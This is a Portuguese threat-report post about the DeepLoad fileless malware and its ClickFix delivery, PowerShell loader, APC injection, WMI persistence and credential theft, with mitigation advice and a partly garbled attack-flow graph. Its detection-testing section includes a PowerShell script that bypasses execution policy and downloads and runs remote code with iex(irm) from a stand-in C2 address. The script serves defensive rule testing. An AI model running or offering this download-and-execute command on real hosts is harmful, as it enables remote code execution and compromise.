SOC Prime Bias: Médio

07 Abr 2026 18:16
newspaper icon ReliaQuest

Malware DeepLoad Combina Entrega ClickFix com Evasão Gerada por IA

Author Photo
Ruslan Mikhalov Chefe de Pesquisa de Ameaças na SOC Prime linkedin icon Seguir
Malware DeepLoad Combina Entrega ClickFix com Evasão Gerada por IA
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumo

DeepLoad é uma família de malware sem arquivo distribuída por meio de engenharia social ClickFix. Ele se baseia em um carregador PowerShell ofuscado, injeção de shellcode na memória em processos confiáveis do Windows e ‘ruído’ gerado por IA para reduzir a fidelidade da detecção estática. O carregador estabelece persistência usando uma tarefa agendada e assinaturas de eventos WMI, pode se propagar via mídia USB e rouba credenciais através de uma extensão de navegador falsa e um componente filemanager.exe complementar.

Investigação

O relatório descreve o acesso inicial começando com um comando PowerShell executado pela vítima, seguido pela recuperação do carregador através do mshta.exe. O carregador usa Add-Type para gerar temporariamente uma DLL em tempo de execução, em seguida, injeta shellcode no LockAppHost.exe usando injeção baseada em APC. A persistência é mantida através de uma tarefa agendada e uma assinatura de evento WMI oculta capaz de restabelecer a infecção mesmo após a limpeza, com uma janela de atraso observada de aproximadamente três dias. O roubo de credenciais é atribuído ao filemanager.exe junto com uma extensão de navegador maliciosa operando em paralelo.

Mitigação

Habilitar Registro de Bloco de Script do PowerShell e alertar sobre cadeias de execução PowerShell suspeitas. Auditar a atividade de rede de saída do mshta.exe, monitorar para a criação inesperada de tarefas agendadas e detectar o uso anômalo do QueueUserAPC indicativo de injeção de APC. Durante a remediação, enumerar e remover explicitamente as assinaturas de eventos WMI ao invés de confiar apenas na limpeza de arquivos/registro. Rotacionar credenciais expostas e remover quaisquer extensões de navegador não autorizadas para cortar caminhos de coleta de credenciais.

Resposta

Se a atividade do DeepLoad for detectada, isolar o host, parar a atividade maliciosa do PowerShell e terminar quaisquer processos injetados. Remover a tarefa agendada e excluir a assinatura de WMI associada, depois erradicar o filemanager.exe e a extensão de navegador maliciosa. Rotacionar todas as credenciais potencialmente comprometidas, sanitizar qualquer mídia USB conectada e validar o sistema quanto a artefatos de injeção residuais antes de devolvê-lo ao serviço.

Palavras-chave: DeepLoad, ClickFix, malware sem arquivo, carregador PowerShell, mshta.exe, Add-Type, shellcode na memória, injeção APC, QueueUserAPC, LockAppHost.exe, persistência de tarefa agendada, assinatura de evento WMI, propagação por USB, extensão de navegador maliciosa, roubo de credenciais.

"graph TB %% Definições de classe classDef action fill:#99ccff %% Definições de nó difinir ação fill:#99ccff de passo_user_exec["<b>Ação</b> – <b>T1204.004 Execução do Usuário: Copia e Cola Malicioso</b><br/&gtVítima executa comando PowerShell via ClickFix."] class step_user_exec action passo_powershell["<b>Ação</b> – <b>T1059.001 Comando e Interpretador de Scripts: PowerShell</b><br/> Baixa carregador usando Invokeu2011Expression (IEX)."] class step_powershell action passo_mshta["<b>Ação</b> – <b>T1218.005 Execução de Proxy Binário do Sistema: Mshta</b><br/>mshta.exe busca script remoto."] class step_mshta acción passo_schtask["<b>Ação</b> – <b>T1053 Tarefa Agendada/Job</b><br/>Cria tarefa de persistência para reu2011executar carregador."] class step_schtask action pass_injeção["<b>Ação</b> – <b>T1055.004 Injeção de Processo: Chamada de Procedimento Assíncrono</b><br/>Injeta shellcode no LockAppHost.exe."] ação de classe step_injection passo_refletivo["<b>Ação</b> – <b>T1620 Carregamento de Código Refletivo</b><br/>Compila inu2011memory DLL via Addu2011Type."] class step_reflective action passo_masquerade["<b>Ação</b> – <b>T1036.003 Mascarando: Renomear Utilitários Legítimos</b><br/>Usa filemanager.exe e atalhos .lnk."] class step_masquerade action passo_removable["<b>Ação</b> – <b>T1091 Reprodução por Mídia Removível / T1080 Taint Shared Content</b><br/>Solta atalhos maliciosos em unidades USB."] class paso_removable action passo_wmi["<b>Ação</b> – <b>T1546.003 Execução de Evento Disparado: Assinatura de Evento WMI</b><br/>Persiste e reu2011executa após a limpeza."] class step_wmi action passo_keylog["<b>Ação</b> – <b>T1056.001 Captura de Entrada: Keylogging</b><br/>Captura pressionamentos de tecla para credenciais."] class step_keylog action passo_cred["<b>Ação</b> – <b>T1555.003 Credenciais de Navegadores da Web / T1176 Extensões de Software</b><br/>Extensão de navegador maliciosa rouba senhas armazenadas."] class step_cred action pass_valid["<b>Ação</b> – <b>T1078 Contas Válidas</b><br/>O atacante usa credenciais coletadas."] class step_valid action step_c2["<b>Ação</b> – <b>T1102.002 Comunicação de Serviço Web Bidirecional / T1102.003 Uniu2011Way</b><br/>Canal C2 e exfiltração."] class step_c2 action %% Conexões passo_user_exec –>|disparar| passo_powershell passo_powershell –>|baixar via| passo_mshta passo_mshta –>|executa| passo_schtask passo_schtask –>|cria| passo_injection passo_injection –>|injeta em| passo_reflective passo_reflective –>|carregar| passo_masquerade passo_masquerade –>|coloca atalhos em| passo_removable passo_removable –>|habilitar| passo_wmi passo_wmi –>|ativa| passo_keylog passo_keylog –>|captura credenciais para| passo_cred passo_cred –>|proporciona| passo_valid passo_valid –>|facilita| passo_c2 "

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Teste Preliminar de Telemetria e Base deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar a exata telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa e Comandos do Ataque:

    1. Primeira ancoragem: O atacante possui uma sessão PowerShell de baixo privilégio no host da vítima.
    2. Contornar política de execução: Ele invoca o PowerShell com -ep Bypass para ignorar quaisquer restrições de execução de script.
    3. Compilar uma carga útil .NET: Usando Add-Type, eles embutem uma pequena classe C# que, quando instanciada, realiza uma solicitação web ao servidor C2 (http://10.0.0.5:3015/index).
    4. Baixar & executar script remoto: O atacante canaliza o resultado de irm (Invoke‑RestMethod) em iex, executando o script malicioso na memória.
    5. Telemetria resultante: A linha de comando registrada pelo SO contém as três strings necessárias (-ep Bypass, Add-Type, iex(irm http://…:3015/index)), satisfazendo a regra Sigma.

  • Script de Teste de Regressão:

    # Execução maliciosa semelhante ao DeepLoad
# Este script reproduz o padrão exato de comando necessário para disparar a regra Sigma.
$c2 = "http://10.0.0.5:3015/index"
$payload = @"
using System;
using System.Net;
public class Loader {
public static void Run() {
    new WebClient().DownloadString(""$c2"");
}
}
"@
# Invocar PowerShell com o flag de bypass, compilar a carga útil, em seguida executar o script remoto
powershell -NoProfile -ExecutionPolicy Bypass -Command `
    "Add-Type -TypeDefinition `$payload; `
     iex (irm $c2)"

  • Comandos de Limpeza:

    # Remover quaisquer arquivos temporários ou assemblies carregados (se persistentes)
Remove-Item -Path "$env:TEMPloader.dll" -ErrorAction SilentlyContinue
# Opcionalmente, limpar o transcript do PowerShell (se habilitado)
Clear-Host

Fim do Relatório

Junte-se à plataforma Detection as Code da SOC Prime para melhorar a visibilidade das ameaças mais relevantes para o seu negócio. Para ajudá-lo a começar e gerar valor imediato, agende uma reunião agora com os especialistas da SOC Prime.

Cadastre-se Gratuitamente